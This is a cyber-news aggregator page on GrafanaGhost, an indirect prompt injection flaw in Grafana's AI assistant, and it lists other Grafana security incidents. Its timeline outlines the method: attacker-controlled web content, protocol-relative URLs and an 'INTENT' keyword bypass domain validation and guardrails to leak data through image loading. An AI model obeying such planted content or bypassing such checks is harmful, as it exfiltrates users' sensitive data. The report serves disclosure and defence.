Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Grafana indirect prompt injection GrafanaGhost security flaw

Vulnerability
First reported
Last updated
Happening score
H score 24
1 unique sources, 1 articles

Summary

Hide ▲

Grafana's AI components had an indirect prompt injection flaw, GrafanaGhost, that could let attackers exfiltrate sensitive data from user-visible content and stored prompts. The issue was patched in Grafana's image renderer and Markdown component, reducing risk for affected instances. Grafana says there is no evidence of exploitation in the wild and no data was leaked from Grafana Cloud.

Related Happenings

Grafana Labs source code leak and extortion demand

Data Leak
First: 19.05.2026 12:15 Last: 19.05.2026 12:15 Sources 1

About this happening: The **Grafana Labs** codebase was **downloaded from its GitHub environment**, creating a risk that proprietary source code could be **released or misused**. The company said **no...

Open Happening

CoinbaseCartel escalates extortion activity with more than 100 victims

Threat Actor Meta
First: 18.05.2026 16:46 Last: 18.05.2026 16:46 Sources 1

About this happening: **CoinbaseCartel** has expanded its extortion operation, publicly listing **more than 100 victims** on a **data leak portal**. The growth signals a more scalable criminal ecosyste...

Open Happening

Grafana Labs Says GitHub hit by cyberattack

Incident
First: 17.05.2026 10:13 Last: 17.05.2026 10:13 Sources 1

About this happening: A **Grafana Labs** incident was later tied to the **Mini Shai-Hulud** supply-chain campaign against **TanStack npm packages**. Grafana said an unauthorized party used a token to a...

Open Happening

Grafana prompt injection exfiltration security flaw

Vulnerability
First: 07.04.2026 17:00 Last: 07.04.2026 17:00 Sources 1

About this happening: **GrafanaGhost** is a critical **Grafana** vulnerability that attackers are using to silently exfiltrate sensitive enterprise data from monitoring environments. The flaw bypasses...

Open Happening

Grafana Enterprise max-severity SCIM privilege-escalation flaw (CVE-2025-41115)

Vulnerability
First: 21.11.2025 19:58 Last: 21.11.2025 19:58 Sources 1

About this happening: A **max-severity** flaw in **Grafana Enterprise** lets a malicious or compromised **SCIM** client turn new users into **administrators** or map them to existing internal accounts,...

Open Happening

Timeline

  1. 07.04.2026 22:52 2 articles · 1mo ago

    Noma Security reports GrafanaGhost and Grafana patches the issue

    Mitigation Patch Update

    Noma Security described GrafanaGhost, an indirect prompt injection issue in Grafana's AI assistant and image-rendering path that used attacker-controlled web content, protocol-relative URLs, and the INTENT keyword to bypass domain validation and guardrails, potentially causing Grafana to leak sensitive data when a malicious image loaded. Grafana said the issue in its image renderer and Markdown component was quickly patched, and reported no evidence of exploitation in the wild or data leaked from Grafana Cloud.

    Show sources
    Open in new tab